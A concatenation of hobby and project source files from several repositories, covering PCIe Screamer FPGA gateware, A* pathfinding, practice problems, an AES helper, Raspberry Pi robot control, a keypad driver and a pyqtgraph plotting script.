).Elif(write_fifo.source.valid,
oe_n.eq(1),
data_w.eq(write_fifo.source.data),
write_fifo.source.ready.eq(1),
NextValue(tempsendval, write_fifo.source.data),
NextValue(temptosend, 0),
wr_n.eq(0),
).Else(
oe_n.eq(1),
wr_n.eq(1),
NextValue(temptosend, 0),
NextState("IDLE")
)
)
fsm.act("RDWAIT",
rd_n.eq(0),
oe_n.eq(0),
wr_n.eq(1),
NextValue(cnt_read, 0),
NextState("READ")
)
fsm.act("READ",
If(wants_write,
NextValue(cnt_read, cnt_read + 1),
),
wr_n.eq(1),
If(pads.rxf_n,
oe_n.eq(0),
rd_n.eq(1),
NextState("IDLE"),
).Elif(cnt_read > timeout,
NextValue(cnt_write, 0),
NextValue(first_write, 1),
NextState("WRITE"),
oe_n.eq(1),
).Else(
oe_n.eq(0),
read_buffer.sink.valid.eq(1),
read_buffer.sink.data.eq(data_r),
NextValue(tempreadval, data_r),
If(read_buffer.sink.ready,
rd_n.eq(0)
).Else(
NextValue(temptoread, 1),
NextState("IDLE"),
rd_n.eq(1)
)
)
)
```
#### File: 3mdeb/pcie_screamer/pcie_screamer.py
```python
import argparse
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.build.generic_platform import *
from litex.soc.cores.clock import *
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.interconnect import stream
from litex.soc.cores.uart import UARTWishboneBridge
from litex.soc.cores.usb_fifo import phy_description
from litepcie.phy.s7pciephy import S7PCIEPHY
from gateware.usb import USBCore
from gateware.etherbone import Etherbone
from gateware.tlp import TLP
from gateware.msi import MSI
from gateware.ft601 import FT601Sync
from litescope import LiteScopeAnalyzer
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
def __init__(self, platform, sys_clk_freq):
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_usb = ClockDomain()
# # #
# sys
sys_clk_100 = platform.request("clk100")
platform.add_period_constraint(sys_clk_100, 1e9/100e6)
self.submodules.pll = pll = S7PLL(speedgrade=-1)
pll.register_clkin(sys_clk_100, 100e6)
pll.create_clkout(self.cd_sys, sys_clk_freq)
# usb
usb_clk100 = platform.request("usb_fifo_clock")
platform.add_period_constraint(usb_clk100, 1e9/100e6)
self.comb += self.cd_usb.clk.eq(usb_clk100)
self.specials += AsyncResetSynchronizer(self.cd_usb, ResetSignal("pcie"))
# PCIeScreamer -------------------------------------------------------------------------------------
class PCIeScreamer(SoCMini):
usb_map = {
"wishbone": 0,
"tlp": 1
}
def __init__(self, platform, with_analyzer=True, with_loopback=False):
sys_clk_freq = int(100e6)
# SoCMini ----------------------------------------------------------------------------------
SoCMini.__init__(self, platform, sys_clk_freq, ident="PCIe Screamer", ident_version=True)
# CRG --------------------------------------------------------------------------------------
self.submodules.crg = _CRG(platform, sys_clk_freq)
# Serial Wishbone Bridge -------------------------------------------------------------------
self.submodules.bridge = UARTWishboneBridge(platform.request("serial"), sys_clk_freq, baudrate=3e6)
self.add_wb_master(self.bridge.wishbone)
# PCIe PHY ---------------------------------------------------------------------------------
self.submodules.pcie_phy = S7PCIEPHY(platform, platform.request("pcie_x1"))
self.add_csr("pcie_phy")
# USB FT601 PHY ----------------------------------------------------------------------------
self.submodules.usb_phy = FT601Sync(platform.request("usb_fifo"), dw=32, timeout=1024)
# USB Loopback -----------------------------------------------------------------------------
if with_loopback:
self.submodules.usb_loopback_fifo = stream.SyncFIFO(phy_description(32), 2048)
self.comb += [
self.usb_phy.source.connect(self.usb_loopback_fifo.sink),
self.usb_loopback_fifo.source.connect(self.usb_phy.sink)
]
# USB Core ---------------------------------------------------------------------------------
else:
self.submodules.usb_core = USBCore(self.usb_phy, sys_clk_freq)
# USB <--> Wishbone --------------------------------------------------------------------
self.submodules.etherbone = Etherbone(self.usb_core, self.usb_map["wishbone"])
self.add_wb_master(self.etherbone.master.bus)
# USB <--> TLP -------------------------------------------------------------------------
self.submodules.tlp = TLP(self.usb_core, self.usb_map["tlp"])
self.comb += [
self.pcie_phy.source.connect(self.tlp.sender.sink),
self.tlp.receiver.source.connect(self.pcie_phy.sink)
]
# Wishbone --> MSI -------------------------------------------------------------------------
self.submodules.msi = MSI()
self.comb += self.msi.source.connect(self.pcie_phy.msi)
self.add_csr("msi")
# Led blink --------------------------------------------------------------------------------
usb_counter = Signal(32)
self.sync.usb += usb_counter.eq(usb_counter + 1)
self.comb += platform.request("user_led", 0).eq(usb_counter[26])
pcie_counter = Signal(32)
self.sync.pcie += pcie_counter.eq(pcie_counter + 1)
self.comb += platform.request("user_led", 1).eq(pcie_counter[26])
# Analyzer ---------------------------------------------------------------------------------
if with_analyzer:
analyzer_signals = [
self.pcie_phy.sink,
self.pcie_phy.source,
]
self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 1024, csr_csv="test/analyzer.csv")
self.add_csr("analyzer")
# Build --------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="PCIe Screamer Test Gateware")
parser.add_argument("--m2", action="store_true", help="use M2 variant of PCIe Screamer")
parser.add_argument("--with-analyzer", action="store_true", help="enable Analyzer")
parser.add_argument("--with-loopback", action="store_true", help="enable USB Loopback")
parser.add_argument("--build", action="store_true", help="Build bitstream")
parser.add_argument("--load", action="store_true", help="Load bitstream")
parser.add_argument("--flash", action="store_true", help="Flash bitstream")
args = parser.parse_args()
if args.m2:
from platforms.pcie_screamer_m2 import Platform
else:
from platforms.pcie_screamer import Platform
platform = Platform()
soc = PCIeScreamer(platform, args.with_analyzer, args.with_loopback)
builder = Builder(soc, csr_csv="test/csr.csv")
builder.build(run=args.build)
if args.load:
prog = soc.platform.create_programmer()
prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bit"))
if args.flash:
prog = soc.platform.create_programmer()
prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bin"))
if __name__ == "__main__":
main()
```
#### File: pcie_screamer/software/etherbone.py
```python
import socket
from litex.soc.tools.remote.etherbone import *
from litex.soc.tools.remote.csr_builder import CSRBuilder
class Etherbone(CSRBuilder):
def __init__(self, csr_csv=None, csr_data_width=32, debug=False):
if csr_csv is not None:
CSRBuilder.__init__(self, self, csr_csv, csr_data_width)
self.debug = debug
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def read(self, addr, length=None):
length_int = 1 if length is None else length
datas = []
for i in range(length_int):
record = EtherboneRecord()
record.reads = EtherboneReads(addrs=[addr + 4*i])
record.rcount = 1
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.socket.sendto(bytes(packet), ("127.0.0.1", 1234))
data, addr = self.socket.recvfrom(1024)
packet = EtherbonePacket(data)
packet.decode()
datas.append(packet.records.pop().writes.get_datas()[0])
if self.debug:
for i, data in enumerate(datas):
print("read {:08x} @ {:08x}".format(data, addr + 4*i))
return datas[0] if length is None else datas
def write(self, addr, datas):
datas = datas if isinstance(datas, list) else [datas]
for i, data in enumerate(datas):
record = EtherboneRecord()
record.writes = EtherboneWrites(base_addr=addr + 4*i, datas=[data])
record.wcount = 1
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.socket.sendto(bytes(packet), ("127.0.0.1", 1234))
if self.debug:
print("write {:08x} @ {:08x}".format(data, addr + 4*i))
if __name__ == '__main__':
etherbone = Etherbone()
print("Testing SRAM write/read:")
for i in range(32):
etherbone.write(0x10000000 + 4*i, i)
print("%08x" %etherbone.read(0x10000000 + 4*i))
identifier = ""
for i in range(0, 32):
identifier += "%c" %etherbone.read(0xe0001800 + 4*i)
print("\nSoC identifier: " + identifier)
pcie_id = etherbone.read(0xe000881c)
print("\nPCIe ID: %04x" %pcie_id)
```
#### File: pcie_screamer/test/test_loopback.py
```python
def main():
f = open("/dev/ft60x0", "r+b")
f.write(bytearray([0x41, 0x42, 0x43, 0x44]))
f.write(bytearray([0x45, 0x46, 0x47, 0x48]))
data = f.read(4)
print(data.hex())
data = f.read(4)
print(data.hex())
if __name__ == "__main__":
main()
``` |
{
"source": "3met/A-Star-Pathfinding",
"score": 2
} |
#### File: A-Star-Pathfinding/src/a_star.py
```python
import random
import numpy as np
# S for start
# E for end
# ' ' for empty
# O for big obstacle (Blocks path)
# o for small obstacle (Slows path)
# x for path
GRID = (('.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', 'E'),
('.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', '.', '.', 'O', '.', 'o', 'o', 'o', 'O', '.', '.', '.', 'O', '.', '.', '.'),
('.', 'O', '.', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', 'O', 'O', '.', '.'),
('.', 'O', 'O', 'O', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', '.', '.', '.', 'o', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', 'O', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', '.', 'O', 'O', 'O', 'O'),
('.', '.', '.', '.', '.', 'O', '.', '.', 'O', 'O', 'O', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', 'O', 'o', 'o', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', 'O', 'O', '.', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', '.', '.', '.', 'O', '.', '.', 'O', 'O', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'o', '.', '.', 'O', '.', '.', '.', 'O', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', 'O', 'O', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', 'O', 'O', 'O', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', 'O', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('.', '.', 'O', '.', '.', '.', '.', '.', 'O', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
('S', '.', 'O', '.', '.', '.', '.', '.', '.', 'O', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.'),
)
# Cost of walking one tile horizontal or vertical
CARDINAL_COST = 10
# Cost of walking one tile diagonal
DIAGONAL_COST = 14
# Added cost of walking on obstacle node
OBSTACLE_COST = 30
# Path class
# Used for storage of movement values
class Path:
def __init__(self):
# Creates a list to store path movements
self.path = []
# Returns number of path movements
def __len__(self):
print(len(self.path))
# Prints path movements
def __str__(self):
print(self.path)
# Adds a movement to the path
def add(self, direction):
self.path.append(direction)
# Pastes the path on a grid object
def paste(self, grid):
grid = list(grid)
# --- Finds the Start Position ---
start_pos = []
exit = False
# Loops through each node in grid
for i_row in range(len(grid)):
for i_col in range(len(grid[i_row])):
# Checks if the node is start position
if grid[i_col][i_row] == 'S':
start_pos = [i_row, i_col]
exit = True
break
if exit:
break
pos = list(start_pos)
# Loops through path movements
for direction in self.path:
# Updates position based on path movement
if direction == 'U':
pos[1] += -1
elif direction == 'R':
pos[0] += 1
elif direction == 'D':
pos[1] += 1
elif direction == 'L':
pos[0] += -1
# Update node value
grid[pos[1]][pos[0]] = 'x'
return grid
# Displays the path on passed grid
def show(self, grid):
grid = __class__.paste(grid)
for row in grid:
print(*row, sep='')
# Nodes class
# Used for storage node type, location, cost value, and list of connected nodes
class Node():
def __init__(self):
self.is_start = False
self.is_end = False
self.walkable = True
self.type = '.'
self.x = 0
self.y = 0
self.e = 0 # Elevation of node
self.f_cost = 0
self.g_cost = 0 # Distance from start node
self.h_cost = 0 # Distance from end node
self.last = None
self.connected = set()
# Returns distance between two nodes
def distance_to(self, node):
dx = abs(self.x-node.x)
dy = abs(self.y-node.y)
dist = 10*abs(dx-dy)
dist += 14*min(dx, dy)
return dist
@staticmethod
# Calculates F cost
def calc_f_cost(origin, destination, end):
# G cost + H cost
return __class__.calc_g_cost(origin, destination) + __class__.calc_h_cost(origin, end)
# Calculates g cost
@staticmethod
def calc_g_cost(origin, destination):
return origin.g_cost + __class__.distance(origin, destination) + destination.e
# Calculates h cost
@staticmethod
def calc_h_cost(origin, end):
return __class__.distance(origin, end)
# Calculates distance between two nodes
@staticmethod
def distance(node, node2):
dx = abs(node.x-node2.x)
dy = abs(node.y-node2.y)
dist = 10*abs(dx-dy)
dist += 14*min(dx, dy)
return dist
# Grid class
# Stores 2d array of nodes based on 2d array of values
class Grid:
def __init__(self, grid):
self.grid = grid
self.solved_grid = None
self.path = Path()
self.coord_path = []
self.solved = False
self.node_grid = []
self.start = Node()
self.end = Node()
# Fills 2d array with nodes
for i in range(len(grid)):
self.node_grid.append([])
for j in range(len(grid[i])):
self.node_grid[i].append(Node())
# Reads passed grid and store values in nodes array
for i in range(len(grid)):
for j in range(len(grid[i])):
for k in range(-1, 2):
for l in range(-1, 2):
if k != 0 or l != 0:
try:
if (i + k) >= 0 and (j + l) >= 0:
self.node_grid[i][j].connected.add(self.node_grid[i + k][j + l])
except IndexError:
pass
self.node_grid[i][j].type = grid[i][j]
self.node_grid[i][j].x = j
self.node_grid[i][j].y = i
if self.node_grid[i][j].type != '.' and self.node_grid[i][j].type != ' ':
if grid[i][j] == 'O':
self.node_grid[i][j].walkable = False
elif grid[i][j] == 'o':
self.node_grid[i][j].e += OBSTACLE_COST
# Sets start and end node
elif grid[i][j] == 'S':
self.start = self.node_grid[i][j]
self.node_grid[i][j].is_start = True
elif grid[i][j] == 'E':
self.end = self.node_grid[i][j]
self.node_grid[i][j].is_end = True
# Updates the grid with a solved path
def a_star(self):
opened = []
closed = set()
opened.append(self.start)
while True:
if len(opened) == 0:
raise BaseException("Error. No path could be found.")
lowest_index = 0
for n_index in range(1, len(opened)):
if opened[n_index].f_cost < opened[lowest_index].f_cost:
lowest_index = n_index
# Store current node in temp variable and remove node from open list
current_node = opened[lowest_index]
opened.remove(current_node)
closed.add(current_node)
# Checks if the end node has been found
if current_node.is_end:
while True:
current_node.type = 'x'
if current_node.is_start:
break
else:
current_node = current_node.last
self.solved = True
return self.path
highest_index = 0
for connected_node in current_node.connected:
# If in open list
if connected_node in opened:
updated_g_cost = Node.calc_g_cost(current_node, connected_node)
if connected_node.g_cost > updated_g_cost:
connected_node.g_cost = updated_g_cost
connected_node.f_cost = Node.calc_f_cost(current_node, connected_node, self.end)
connected_node.last = current_node
# If not in open list and not in closed list
elif connected_node not in closed and connected_node.walkable:
connected_node.last = current_node
connected_node.g_cost = Node.calc_g_cost(current_node, connected_node)
connected_node.f_cost = Node.calc_f_cost(current_node, connected_node, self.end)
opened.append(connected_node)
# Displays the grid
def show(self):
for row in self.grid:
print(*row, sep=' ')
# Prints solved grid
def show_solved(self):
if self.solved:
for i in range(len(self.node_grid)):
for j in range(len(self.node_grid[i])):
print(self.node_grid[i][j].type, end=' ')
print() # New line
else:
print("Grid is unsolved. Use Grid solve method to solve.")
# Main Function
def main():
height = 20
width = 20
grid = Grid(GRID)
print("\nUnsolved Grid:")
grid.show()
print("\nSolved Grid:")
grid.a_star()
grid.show_solved()
if __name__ == "__main__":
main()
``` |
{
"source": "3mmar7amed/Practice-Problems",
"score": 4
} |
#### File: Practice-Problems/2015-09-28/knight-coins.py
```python
def getRich(n):
days = list(range(n))
pay, days_until_pay_increase = 1, 1
total = 0
for day in days:
total += pay
days_until_pay_increase -= 1
if days_until_pay_increase == 0:
pay += 1
days_until_pay_increase = pay
return total
def main():
input_f = open("GoldCoinsInput.txt", 'r')
output_f = open("GoldCoinsOutput.txt", 'w')
for n in input_f:
n = int(n)
if n == 0: break
output_f.write(str(getRich(n)) + "\n")
input_f.close()
output_f.close()
if __name__ == "__main__":
main()
```
#### File: Practice-Problems/2016-11-15/AESCipher.py
```python
from Crypto import Random
from Crypto.Cipher import AES
import base64, hashlib
class AESCipher(object):
def __init__(self, key):
# Store SHA-256 digest of key
self.key = hashlib.sha256(key.encode('utf-8')).digest()
self.bs = 32
def _pad(self, s):
area_to_pad = self.bs - len(s) % self.bs
padding = area_to_pad * chr(area_to_pad).encode('utf-8')
return s + padding
def _unpad(self, s):
return s[:-ord(s[len(s) - 1:])]
def encrypt(self, data):
data = self._pad(data.encode('utf-8'))
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(data)).decode('utf-8')
def decrypt(self, ciphertext):
ciphertext = base64.b64decode(ciphertext)
iv = ciphertext[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(ciphertext[AES.block_size:])).decode('utf-8')
```
#### File: 2016naq/team-one/probD.py
```python
def main():
line = raw_input()
if line == '':
print('possible')
return
if len(line) % 2 == 1:
print('impossible')
return
i = 0
j = len(line) - 1
swapped = False
poss = True
while i < j:
ch1 = line[i]
ch2 = line[j]
if ch1 == ')' and ch2 == '(':
if swapped:
poss = False
break
swapped = True
elif ch1 == ')' and ch2 == ')':
if swapped:
poss = False
break
swapped = True
elif ch1 == '(' and ch2 == '(':
if swapped:
poss = False
break
swapped = True
i += 1
j -= 1
if poss:
print('possible')
else:
print('impossible')
main()
```
#### File: Practice-Problems/2017-1-26/threading_example2.py
```python
import threading
import time
class myThread(threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
print('Starting ' + self.name)
calculateMass(self.name, self.counter, 5)
print('Exiting ' + self.name)
def calculateMass(threadName, delay, counter):
for i in range(counter):
time.sleep(delay)
print('{0}: on iteration {1}'.format(threadName, i+1))
def calculateDensity(threadName):
print('{} starting to calculate the density...'.format(threadName))
total = 0
for i in range(5555):
for j in range(9999):
total += 1
print('{} finished calculating density...'.format(threadName))
thread1 = myThread(1, 'Thread-1', 1)
thread2 = threading.Thread(target=calculateDensity, name='Thread-2', args=['Thread-2'])
# Start threads
thread1.start()
thread2.start()
print('Exiting main thread...')
```
#### File: Practice-Problems/2017-1-26/threading_timer_example.py
```python
import threading
import time
def hello():
print('Hello')
t = threading.Timer(5.0, hello)
t.start()
print('After started the timer')
``` |
{
"source": "3mp3ri0r/cpyfunctional",
"score": 4
} |
#### File: cpyfunctional/tests/tests_func_curry.py
```python
import unittest
import cpyfunctional
class TestFuncCurry(unittest.TestCase):
"""
Test func_curry function able to make callable accept parameters.
"""
def test_func_curry_able_to_make_callable_accept_params(self):
"""
func_curry given callable that given multiple params, able to return value from them.
"""
def add(number1: int, number2: int, prev_number: int) -> int:
return number1 + number2 + prev_number
result = cpyfunctional.compose(cpyfunctional.func_curry(add)(5, 7), lambda number: number ** 2)(3)
self.assertEqual(result, 21)
``` |
{
"source": "3M-Pi-Robot/RobotHack2021",
"score": 3
} |
#### File: RobotHack2021/led3/led3.py
```python
import pin
import time
def f15():
# 1 + 5
pin.Out("LED1",1)
pin.Out("LED2",0)
pin.Out("LED3",0)
pin.Out("LED4",0)
pin.Out("LED5",1)
time.sleep(0.5)
def f24():
# 2 + 4
pin.Out("LED1",0)
pin.Out("LED2",1)
pin.Out("LED3",0)
pin.Out("LED4",1)
pin.Out("LED5",0)
time.sleep(0.5)
def f3():
# 3
pin.Out("LED1",0)
pin.Out("LED2",0)
pin.Out("LED3",1)
pin.Out("LED4",0)
pin.Out("LED5",0)
time.sleep(0.5)
pin.load("config.json")
for i in range(0,30):
f15()
f24()
f3()
f24()
f15
# cleanup
pin.cleanup()
```
#### File: RobotHack2021/server1/mysimpleserver.py
```python
from flask import Flask
app = Flask(__name__)
@app.route("/")
def showIndex():
return "Hello Martin"
if __name__ == "__main__":
app.run(host="0.0.0.0")
```
#### File: RobotHack2021/server3/server3.py
```python
import pin
from flask import Flask
app = Flask(__name__)
pin.load("config.json")
filename="control.html"
@app.route("/")
def showIndex():
with open(filename, "r") as file:
return file.read()
@app.route("/move/<left>/<right>")
def moveTo(left,right):
print(left,right)
ena=int(left)
enb=int(right)
# set the motor speed
if(ena>=0):
ena = min(ena, 100)
pin.Level("ENA",ena)
pin.Out("IN1",0)
pin.Out("IN2",1)
else:
ena_minus = abs(ena)
ena_minus = min(ena_minus, 100)
pin.Level("ENA",ena_minus)
pin.Out("IN1",1)
pin.Out("IN2",0)
if(enb>=0):
enb = min(enb, 100)
pin.Level("ENB",enb)
pin.Out("IN3",1)
pin.Out("IN4",0)
else:
enb_minus = abs(enb)
enb_minus = min(enb_minus, 100)
pin.Level("ENB",enb_minus)
pin.Out("IN3",0)
pin.Out("IN4",1)
with open(filename, "r") as file:
return file.read()
if __name__ == "__main__":
app.run(host="0.0.0.0")
```
#### File: RobotHack2021/stepper/pin.py
```python
import json
import RPi.GPIO as GPIO
# BCM Mode (read the real GPIO)
GPIO.setmode(GPIO.BCM)
# store all the items in dict after read json
pinItems = {}
# open the file
def load(filename):
try:
# open
with open(filename, "r") as file:
# read and parse JSON
items = json.loads(file.read())
except:
# if something goes wrong
print("Error loading config.json")
exit(0)
# store the items by name
# i.e. pinItems["switch"] = ...
global pinItems
pinItems = items;
# initialize all pins as
# in, out or pwm
for name, item in items.items():
pin = item["pin"]
if(item["io"] == "in"):
# configure an input
GPIO.setup(pin, GPIO.IN, pull_up_down = GPIO.PUD_UP)
if(item["io"] == "out"):
# configure an output
GPIO.setup(pin, GPIO.OUT)
if(item["io"] == "pwm"):
# configure pwm
GPIO.setup(pin, GPIO.OUT)
pinItems[name]=GPIO.PWM(pin,500)
# GPIO input
def In(name):
global pinItems
return GPIO.input(pinItems[name]["pin"])
# GPIO output
def Out(name,state):
global pinItems
GPIO.output(pinItems[name]["pin"], state)
#GPIO pwm level
def Level(name,level):
global pinItems
if(level == 0):
pinItems[name].stop()
else:
pinItems[name].start(0)
pinItems[name].ChangeDutyCycle(level)
def cleanup():
GPIO.cleanup()
``` |
{
"source": "3mpr/OSRBox",
"score": 3
} |
#### File: 3mpr/OSRBox/OSRBoxDriver.py
```python
import OSRBoxWrapper
import serial.tools.list_ports
import keyboard
import threading
import time
import os
import yaml
class OSRBoxDriver:
nb_keys = 5
'''
Class Constructor.
Initializes a few important variables, such as COM port, baudrate and
emulated keys.
'''
def __init__( self, port = False ):
self.port = None
self.emulated_keys = { 1 : 'a', 2 : 'z', 3 : 'e', 4 : 'r', 5 : 't' }
self.osr_conf = self.load_conf( 'OSRBox.yml' )
self.delayed_setup = True
if port:
self.delayed_setup = False
self.port = port
elif port is False and self.osr_conf['port']:
self.port = self.osr_conf['port']
#self.pad = OSRBoxWrapper.OSRBoxWrapper( port, 19200 )
'''
Destructor redifinition.
'''
def __del__( self ):
self.reader_alive = False
self.alive = False
self.pad.close()
'''
Binds one of the OSRBox numerical keys to emulate a given keyboard key.
@param int nb The pressed OSRBox key
@param string key The emulated key description
'''
def bind( self, nb, key):
if ( nb > self.nb_keys ):
raise ValueError( 'There is only 5 keys on the OSRBox!' )
self.emulated_keys[nb] = key
'''
Keeps track of the current OSRBox pressed key and emulate keyboard keys
according to the <emulated_keys> dictionnary.
'''
def reader( self ):
last_key_pressed = False
while self.reader_alive:
key_pressed = self.pad.read()
if key_pressed:
for key in self.emulated_keys:
if key_pressed == key and key_pressed != last_key_pressed:
last_key_pressed = key_pressed
keyboard.press( self.emulated_keys[key] )
elif last_key_pressed:
keyboard.release( self.emulated_keys[last_key_pressed] )
last_key_pressed = False
'''
Runs two thread, one is a MINI(!)term and let the user ends the program,
the other keeps updated the current active key.
'''
def bootstrap( self ):
if self.delayed_setup:
self.conf = self.load_conf()
if not self.port:
self.port = OSRBoxDriver.seek_port()
self.pad = OSRBoxWrapper.OSRBoxWrapper( self.port, 19200 )
self.osr_conf = self.load_conf( 'OSRBox.yml' )
for k in self.osr_conf['keys']:
self.bind( k, self.osr_conf['keys'][k] )
self.pad.open()
self.reader_alive = True
self._reader = threading.Thread( target = self.reader, name = 'rx' )
self._reader.start()
self._reader.join()
self._term = threading.Thread( target = self.term, name = 'term' )
self._term.start()
'''
'''
def run( self ):
self.alive = True
self.reader_alive = True
while self.alive:
try:
self.bootstrap()
except serial.serialutil.SerialException, TypeError:
self.reader_alive = False
self.port = None
time.sleep( 1 )
'''
Ends the process.
'''
def stop( self ):
self.reader_alive = False
self.alive = False
'''
Exit mini (one key!) terminal.
'''
def term( self ):
while self.reader_alive:
exit = raw_input( 'Press Q to stop the OSRBox...' )
if exit == 'Q':
self.reader_alive = False
self.alive = False
'''
'''
def load_conf( self, fd = 'OSRBox.yml' ):
stream = open( fd, 'r' )
yaml_fd = yaml.load( stream )
stream.close()
return yaml_fd['OSRBox']
'''
Seeks the first available COM port and returns it.
@return string The port name
'''
@staticmethod
def seek_port():
print( '\nStarting port analysis...' )
available_com = None
while not available_com:
time.sleep( 1 )
available_com = serial.tools.list_ports.comports()
return available_com[0].device
if __name__ == '__main__':
drv = OSRBoxDriver()
drv.run()
``` |
{
"source": "3mRoshdy/Learn-FastAPI",
"score": 3
} |
#### File: 3mRoshdy/Learn-FastAPI/main.py
```python
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
@app.get('/')
async def root():
return { "message": "Hello World" }
@app.get('/people/{person_name}')
async def greet_person(
person_name: str, extras: Optional[str] = None
):
response = {"message": "Hello there %s!" % person_name}
if extras:
response.update({"extras": extras})
return response
``` |
{
"source": "3mrrrx/slim2voice",
"score": 3
} |
#### File: slim2voice/tut/live_pyQtpgrah_fft.py
```python
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import pyqtgraph.exporters
import numpy as np
import serial
ser = serial.Serial(
port='COM4',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1
)
ser.close()
ser.open()
print (ser.isOpen())
data = np.zeros(64)
app = QtGui.QApplication([])
p = pg.plot()
p.setWindowTitle('FFT')
p.setLabel('bottom', 'Index', units='B')
curve = p.plot()
def update():
global curve, data,
if(ser.readline() == b'*\n'): # "*" indicates start of transmission from tiva c
for h in range(63):
try:
data[h] = int(ser.readline()) #get 64 bytes from tiva c and plot them
except:
pass
curve.setData(data)
app.processEvents() ## force complete redraw for every plot
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
```
#### File: slim2voice/tut/plots_insame_window.py
```python
import pyqtgraph/initExample ## Add path to library (just for examples; you do not need this)
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import pyqtgraph.exporters
import numpy as np
import cv2
import numpy as np
import time
# for logging function
import sys, os
# debug flags
show_imgs_for_colors = 1
def read_frame(scale_factor=1):
ret, frame2 = cap.read()
# rescale image for perfromance
scale = 1 / len(colors) / scale_factor
imgs = cv2.resize(frame2, (0, 0), None, scale, scale)
return imgs, frame2
def percent_color(img, color_min = np.array([0, 0, 128], np.uint8), color_max= np.array([250, 250, 255], np.uint8) ):
#RED_MIN = np.array([0, 0, 128], np.uint8)
#RED_MAX = np.array([250, 250, 255], np.uint8)
size = img.size
dstr = cv2.inRange(img, color_min, color_max)
no_color = cv2.countNonZero(dstr)
frac_color = np.divide((float(no_color)), (int(size)))
percent_color = np.multiply((float(frac_color)), 100)
#print('color: ' + str(percent_color) + '%')
return percent_color
def percent_color_singel(img,color = [145,80,40], threshold = 20, disp = "image" ):
boundaries = [([max(color[2] - threshold,0),max(color[1] - threshold,0),max(color[0] - threshold,0)],
[min(color[2] + threshold,255), min(color[1] + threshold,255), min(color[0] + threshold,255)])]
# in order BGR as opencv represents images as numpy arrays in reverse order
for (lower, upper) in boundaries:
lower = np.array(lower, dtype=np.uint8)
upper = np.array(upper, dtype=np.uint8)
mask = cv2.inRange(img, lower, upper)
output = cv2.bitwise_and(img, img, mask=mask)
ratio_brown = cv2.countNonZero(mask) / (img.size / 3)
perc = np.round(ratio_brown * 100, 2)
#print('the color: ' + str(color) + ' ,has a pixel percentage:', perc, '%.')
##cv2.imshow( disp, np.hstack([img, output]))
#cv2.imshow(disp, output)
#cv2.waitKey(0)
return perc, output
def FFT_AMP(data):
data= data - data.mean()
data=np.hamming(len(data))*data
data=np.fft.fft(data)
data=np.abs(data)
return data
###########################################################################################################################
# video source
###########################################################################################################################
# web cam
cap = cv2.VideoCapture(0)
###########################################################################################################################
# initale varaibles
###########################################################################################################################
# colors to select from
#colors = [([145, 80, 40], 50), ([50, 80, 255], 50), ([185, 130, 51], 50), ([50, 10, 39], 50), ([50, 80, 39], 50)]
#colors = [([255, 0, 0], 50), ([0, 0, 0], 50), ([135,4,0], 50), ([0, 255, 0], 50), ([200, 130, 180], 50),([255, 0, 255], 50),([185,124,109], 50)]
#colors = [([150, 150, 150], 120), ([0, 0, 0], 50), ([150, 150, 150], 70), ([0, 0, 0], 20)]
#colors = [ ([150, 150, 150], 70), ([0, 0, 0], 20)]
colors = [([135,4,0], 50), ([0,0,0], 30)]
# number of saved frames for witch the perc. are saved
perc_buffer = 128
